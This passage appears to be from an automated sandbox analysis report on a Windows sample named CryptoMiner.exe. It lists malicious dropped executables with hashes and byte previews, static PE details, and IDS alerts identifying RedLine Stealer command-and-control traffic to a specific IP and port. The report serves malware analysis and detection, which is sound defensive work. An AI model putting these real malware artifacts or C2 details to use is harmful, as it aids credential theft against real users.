                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:1

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzjhia3q.y0o.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1

                                                                                                                                      C:\Users\user\AppData\Local\Temp\filename.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4879360
                                                                                                                                      Entropy (8bit):7.9984899222641435
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:98304:mQi4NSWhwXCzdRTm4OVgThNEUdhgjcAwLgq+a6T8g/Ztr4JIs/:Hi4U+rTmoNEUfWcAZ5TPZtr4WK
                                                                                                                                      MD5:C108EBDD14A2CF40E64411792987796A
                                                                                                                                      SHA1:48F4F5376D0A571784FA03F89015C6A72F74998D
                                                                                                                                      SHA-256:F9BFF1AC8E6C15DDE928E87A8BF733006CA805D42302387B2C24E11E555B7EE6
                                                                                                                                      SHA-512:CFE4079D70F380AD98CC44CD9F05500FF8AF79421EA32012B873425BBF045D2DA8F9B7942941655FABB64E66D6CEBDDD174FA4C3C3C3ABC54B120CAD6E261E07
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...S.ab.........."......lJ.............. .....@..... ........................J...........@...@......@............... ................................J.............................................................................................. ..H............text....kJ.. ...lJ................. ..`.rsrc.........J......nJ.............@..@........................................H.........I.........;........................................................O...3.....7H.....!%..g...{.N..?..y.....3.....n..9.]'....U].8W8..4:..)....9.P.rd.."o~n....K..*....an.......vE...`/N...^...H.......ne.'..W..\T....@.[...F.2...c]..u..I.g.M.. $.>..w.Il@! =;.j..-..d .\4..G@=..p?.B7...C.k.Jz...2r~.`.m.......In]...d...Q..]."...fI.u.....,.9..pZ..B.iIj........;c.<3.e>.y..g....TfZ.M..&&@!^_...m...FI.3.{Ne..2:.Rd.o.......f33.|.........~.....62......:.oj...p.(dJ..g

                                                                                                                                      C:\Users\user\AppData\Local\Temp\fname.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3677592
                                                                                                                                      Entropy (8bit):6.364458086173346
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:xjFJEyX5ZYpLKwYXA8NMLgJ0CYkL1N5qV0O8:ZFSyJZ8LYEgCCYkDxO8
                                                                                                                                      MD5:C61F9A9059F8B8BD0E69F7DF4CB09786
                                                                                                                                      SHA1:70FFFDE0DEBF4559859617D49DC48C54DF3C156D
                                                                                                                                      SHA-256:84A5A26F1748C3AD1F0B98C438908E8DC842EACC6390484527EE1FE7E56264F5
                                                                                                                                      SHA-512:6A838D9663517E1F89BF47F9BA85B72CD431F0D61C4DB97E69516FFA313D8BDFC9F619EB51EAD5215786E523B43CDE3186300CF3BFAB7408D580C66CD7D00453
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k\8./=V./=V./=V.;VU.!=V.;VS..=V.;VR.9=V.}HR.>=V.}HU.;=V.}HS.e=V.;VW.*=V./=W.r=V..HS..=V..HT..=V.Rich/=V.........................PE..L...)........................J.......0"...........@.............W.............7...........@.................................9`..P.....7.............h.7.0I..........................................................................................JICeboQ.5^.......`..........a...c... ..`zcPlt...uP...p...R...d..m.......}.T. ..`rrF5ta......................?.......@..@IKbga.............................[.@...03AAoc...-..................W.....2.@..B6maTqw...@... ...@..................@...PKmYta.......`.......(..\...O.....=.@...gTx1qw...`"..p...`"..*..>...u...9...`...9YRtc.........7.......7.k.......\...@..@........................................................................................................................................

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):6.935706403073255
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:CryptoMiner.exe
                                                                                                                                      File size:1579064
                                                                                                                                      MD5:310eb5bd45ac9c5767d28e63ab64635b
                                                                                                                                      SHA1:4ac0d40abb71e9fcff34c8f67511fc590f495f3e
                                                                                                                                      SHA256:d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6
                                                                                                                                      SHA512:c2b0c3e890bb92f527960230c97c9c75ce50a2b9c4186c1dea87f7e55892702ac82805e5a038b8d32614790357c3ad113afe63e7f77cc99866801f4fdbac5e97
                                                                                                                                      SSDEEP:24576:07L4j8tb74F0xt7ruJV/QujUOycEvgyJrDybsxXX+ZVGNVooHI9s5KCfj2:07L4jIIct7w/QujMvOgUwLoKIG2
                                                                                                                                      TLSH:EC75ADB7384C859AE91B8E70C834E6620B5F9D238F55089652DC3DA7B83B1F0647DD8B
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q*.p?y.p?y.p?yq>.y.p?y...y.p?y...y.p?y...yep?y...y.p?y.p>y.p?y...y.p?y...y.p?yRich.p?y........................PE..L...X.rb...

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:f0c6cac9ecb6cccc

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x429132
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                      Time Stamp:0x6272C458 [Wed May 4 18:22:16 2022 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:efad26290bf4d1a676b7ad79139e8cdb

                                                                                                                                      Authenticode Signature

                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=Certum Domain Validation CA SHA2, OU=Certum Certification Authority, O=Unizeto Technologies S.A., C=PL
                                                                                                                                      Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                                                                                                                      Error Number:-2146762486
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 9/28/2021 8:03:57 AM 10/28/2022 8:03:56 AM
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=*.elo.com
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:EAB698D40D1FA25789A10E55422B5372
                                                                                                                                      Thumbprint SHA-1:A5A560E22CA4075C52801E63977DA1FC5D798829
                                                                                                                                      Thumbprint SHA-256:FF8F3AD6662949E8FEB753DAA023FC4DDEFE4C275BB98BCB9CFA1D225CBCBEA8
                                                                                                                                      Serial:01CA3A6DBD89E3BA09A6983260FE8F96

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      call 00007F8F2CCE6AFFh
                                                                                                                                      jmp 00007F8F2CCDFA7Eh
                                                                                                                                      push dword ptr [005235E8h]
                                                                                                                                      call dword ptr [00401068h]
                                                                                                                                      test eax, eax
                                                                                                                                      je 00007F8F2CCDFBF4h
                                                                                                                                      call eax
                                                                                                                                      push 00000019h
                                                                                                                                      call 00007F8F2CCE5F53h
                                                                                                                                      push 00000001h
                                                                                                                                      push 00000000h
                                                                                                                                      call 00007F8F2CCE30DFh
                                                                                                                                      add esp, 0Ch
                                                                                                                                      jmp 00007F8F2CCE30A4h
                                                                                                                                      mov edi, edi
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 20h
                                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      push 00000008h
                                                                                                                                      pop ecx
                                                                                                                                      mov esi, 0040146Ch
                                                                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                                                                      rep movsd
                                                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                                      pop edi
                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                      pop esi
                                                                                                                                      test eax, eax
                                                                                                                                      je 00007F8F2CCDFBFEh
                                                                                                                                      test byte ptr [eax], 00000008h
                                                                                                                                      je 00007F8F2CCDFBF9h
                                                                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                      push eax
                                                                                                                                      push dword ptr [ebp-10h]
                                                                                                                                      push dword ptr [ebp-1Ch]
                                                                                                                                      push dword ptr [ebp-20h]
                                                                                                                                      call dword ptr [0040108Ch]
                                                                                                                                      leave
                                                                                                                                      retn 0008h
                                                                                                                                      mov edi, edi
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push ecx
                                                                                                                                      push ebx
                                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                                      add eax, 0Ch
                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                      mov ebx, dword ptr fs:[00000000h]
                                                                                                                                      mov eax, dword ptr [ebx]
                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                                      mov ebx, dword ptr [ebp+0Ch]
                                                                                                                                      mov ebp, dword ptr [ebp-04h]
                                                                                                                                      mov esp, dword ptr [ebx-04h]
                                                                                                                                      jmp eax
                                                                                                                                      pop ebx
                                                                                                                                      leave
                                                                                                                                      retn 0008h
                                                                                                                                      pop eax
                                                                                                                                      pop ecx
                                                                                                                                      xchg dword ptr [esp], eax
                                                                                                                                      jmp eax
                                                                                                                                      mov edi, edi
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push ecx
                                                                                                                                      push ecx
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      mov esi, dword ptr fs:[00000000h]

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2010 build 30319
                                                                                                                                      • [LNK] VS2010 build 30319
                                                                                                                                      • [ C ] VS2010 build 30319
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [C++] VS2010 build 30319

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x11fba00x50.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1280000x5c37c.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1804000x1438.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x1980.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11e00x1c.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6a280x40.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x170.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x11f3d00x11f400False0.82463861238data7.61191579951IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x1210000x394c0x1a00False0.316856971154data3.78649660619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x1250000x2d100x2e00False0.447860054348data4.47251298963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x1280000x5c37c0x5c400False0.107588605183data2.9506947336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                      RT_ICON0x1283880x42028dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0GermanAustria
                                                                                                                                      RT_ICON0x16a3b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0GermanAustria
                                                                                                                                      RT_ICON0x17abd80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65535, next used block 4294901760GermanAustria
                                                                                                                                      RT_ICON0x17ee000x25a8dataGermanAustria
                                                                                                                                      RT_ICON0x1813a80x10a8dataGermanAustria
                                                                                                                                      RT_ICON0x1824500x988dataGermanAustria
                                                                                                                                      RT_ICON0x182dd80x468GLS_BINARY_LSB_FIRSTGermanAustria
                                                                                                                                      RT_MENU0x1832400x3edataGermanAustria
                                                                                                                                      RT_MENU0x1832800xd0dataGermanAustria
                                                                                                                                      RT_MENU0x1833500x4edataGermanAustria
                                                                                                                                      RT_STRING0x1833a00x16cdataGermanAustria
                                                                                                                                      RT_STRING0x18350c0x5e0dataGermanAustria
                                                                                                                                      RT_STRING0x183aec0x4ccdataGermanAustria
                                                                                                                                      RT_STRING0x183fb80x70dataGermanAustria
                                                                                                                                      RT_GROUP_ICON0x1840280x68dataGermanAustria
                                                                                                                                      RT_VERSION0x1840900x2ecdataGermanAustria

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllGenerateConsoleCtrlEvent, GlobalAlloc, LoadLibraryW, FreeConsole, GetAtomNameW, GetACP, MultiByteToWideChar, GetLastError, GetProcAddress, OutputDebugStringW, GetCurrentProcessId, AddConsoleAliasA, GlobalReAlloc, SetEndOfFile, CreateFileW, CreateFileA, WriteConsoleW, AllocConsole, SetConsoleTitleW, GetConsoleAliasExesA, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, GetCPInfo, HeapAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, SetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, WriteFile, GetConsoleCP, GetConsoleMode, SetHandleCount, GetStdHandle, CloseHandle, GetModuleHandleW, ExitProcess, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapCreate, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetLocaleInfoW, HeapSize, FlushFileBuffers, ReadFile, SetFilePointer, GetOEMCP, IsValidCodePage, GetStringTypeW, HeapReAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetProcessHeap
                                                                                                                                      USER32.dllOffsetRect, MessageBoxA, IsRectEmpty, InvertRect
                                                                                                                                      GDI32.dllResizePalette, SaveDC

                                                                                                                                      Version Infos

                                                                                                                                      DescriptionData
                                                                                                                                      LegalCopyrightCopyright (C) 2020-2022 by Tetec Inc.
                                                                                                                                      InternalNameSnhgowdekrift
                                                                                                                                      FileVersion5.10.8.100
                                                                                                                                      CompanyNameTetec Inc
                                                                                                                                      ProductNameDikem
                                                                                                                                      ProductVersion30.77.57.46
                                                                                                                                      FileDescriptionYequokos yagi
                                                                                                                                      OriginalFilenameBtderogatnive.exe
                                                                                                                                      Translation0x0c07 0x0c07

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      GermanAustria

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      05/05/22-03:30:52.519175 05/05/22-03:30:52.519175TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:54.158486 05/05/22-03:30:54.158486TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:54.966150 05/05/22-03:30:54.966150TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:46.265169 05/05/22-03:30:46.265169TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:55.048172 05/05/22-03:30:55.048172TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:51.349484 05/05/22-03:30:51.349484TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:51.712280 05/05/22-03:30:51.712280TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:52.800684 05/05/22-03:30:52.800684TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:52.844061 05/05/22-03:30:52.844061TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:55.007583 05/05/22-03:30:55.007583TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:40.973991 05/05/22-03:30:40.973991TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:32.990118 05/05/22-03:30:32.990118TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:46.475836 05/05/22-03:30:46.475836TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:52.885401 05/05/22-03:30:52.885401TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:51.428831 05/05/22-03:30:51.428831TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:51.508362 05/05/22-03:30:51.508362TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:34.048200 05/05/22-03:30:34.048200TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:54.760590 05/05/22-03:30:54.760590TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:34.088289 05/05/22-03:30:34.088289TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response329364979665.21.213.209192.168.2.5
                                                                                                                                      05/05/22-03:30:54.711716 05/05/22-03:30:54.711716TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209
                                                                                                                                      05/05/22-03:30:51.576541 05/05/22-03:30:51.576541TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979632936192.168.2.565.21.213.209

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 5, 2022 03:30:32.717856884 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:32.757303953 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:32.757483959 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:32.990118027 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:33.029907942 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:33.134170055 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:34.048199892 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:34.088289022 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:34.228029013 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:40.973990917 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:41.015883923 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:41.015945911 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:41.016005993 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:41.030867100 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:46.265168905 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:46.305705070 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:46.433991909 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:46.475836039 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:46.516613960 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:46.637170076 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.349483967 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.389652014 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.428831100 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.506915092 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.508362055 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.548115015 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.576540947 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.616422892 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.660538912 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.699999094 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.700042963 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.700431108 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.712280035 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:51.752146959 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:51.840686083 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.519175053 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.559257984 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:52.637619019 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.742120028 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.781497002 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:52.781806946 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:52.800683975 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.840262890 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:52.844060898 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.883656025 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:52.885401011 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:52.925014019 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.028294086 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.414020061 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.453573942 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.453602076 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.453712940 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.453780890 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.453856945 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.453949928 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493171930 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493200064 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493307114 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.493355989 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493453979 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.493499994 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493592024 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.493668079 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.493761063 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.493809938 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.532697916 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.532780886 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.532963991 CEST329364979665.21.213.209192.168.2.5
